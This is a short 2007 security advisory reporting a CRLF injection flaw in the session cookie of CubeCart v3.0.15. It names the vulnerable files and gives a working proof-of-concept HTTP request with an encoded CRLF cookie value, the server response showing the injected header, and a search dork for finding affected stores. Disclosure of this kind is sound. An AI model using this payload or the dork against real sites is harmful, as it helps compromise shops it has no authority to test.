UPDATED: CubeCart (v3.0.15) - CRLF Injection Vulnerability

2007-05-07T00:00:00
ID SECURITYVULNS:DOC:16947
Type securityvulns
Reporter Securityvulns
Modified 2007-05-07T00:00:00

Description

Note to BugTraq: Forgot to tell which files are vulnerable. Sorry!

CubeCart (v3.0.15) - CRLF Injection Vulnerability

It is possible to set the cookie (prefixed with ccSID) to cause CRLF injection.

Vulnerable files: cart.php, index.php

HTTP Request:

GET / HTTP/1.0 Accept: / User-Agent: Browser/1.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.cubecart.com Cookie: ccSIDb05df7533e9e599e942866426123cbfb=%0d%0aINJECTED-HEADER%3Ainjected-data;ccUser=ZTYwNjY1YWEyMTE5MDc4NTJhYmY0Yjk5NjQ1NjAyZmQ%253D Connection: Close Pragma: no-cache

HTTP Response:

HTTP/1.1 200 OK Date: Sat, 05 May 2007 22:02:26 GMT Server: Apache/2.0.59 (Unix) X-Powered-By: PHP/5.0.4 Set-Cookie: ccSIDb05df7533e9e599e942866426123cbfb= INJECTED-HEADER: injected-data Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ccUser=YTk4YmIxMjI0YmYwYWRmM2NhMjkzNmFlNTZhMjJmNzk%3D; expires=Mon, 07 May 2007 22:02:26 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1

Vulnerable: v3.0.15 (others may also be affected) Google d0rk: "Powered by CubeCart"

John Martinelli john@martinelli.com http://john-martinelli.com

May 5th, 2007